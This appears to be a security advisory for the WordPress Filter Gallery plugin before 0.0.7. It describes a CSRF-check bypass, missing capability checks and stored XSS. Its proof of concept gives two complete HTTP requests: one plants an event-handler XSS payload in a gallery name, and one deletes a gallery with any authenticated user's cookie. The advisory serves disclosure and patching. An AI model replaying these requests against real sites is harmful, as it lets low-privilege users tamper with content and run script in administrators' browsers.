Filter Gallery < 0.0.7 – Unauthorised AJAX Calls

Description

The plugin had a logic flaw in the CSRF checks of its AJAX calls, allowing them to be passed by not providing the related parameter in the request. This could allow attacker to make logged in users do unwanted actions. Furthermore, the AJAX calls are also lacking capability checks, allowing any authenticated user (such as subscriber) to call them and delete/edit/add arbitrary galleries. Finally, some of the fields were not sanitised before being output in the response, which could also lead to Cross-Site Scripting issues

Proof of Concept

Add a gallery with an XSS payload in it (triggered when editing a gallery)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 142
Connection: close
Cookie: [any authenticated user]

action=ufg_gallery_filters&id=1&gallery_name=Test%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f&filters=%5B%5D


Delete a gallery:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [any authenticated user]

action=ufg_remove_gallery&do_action=single&ufg_gallery_id=1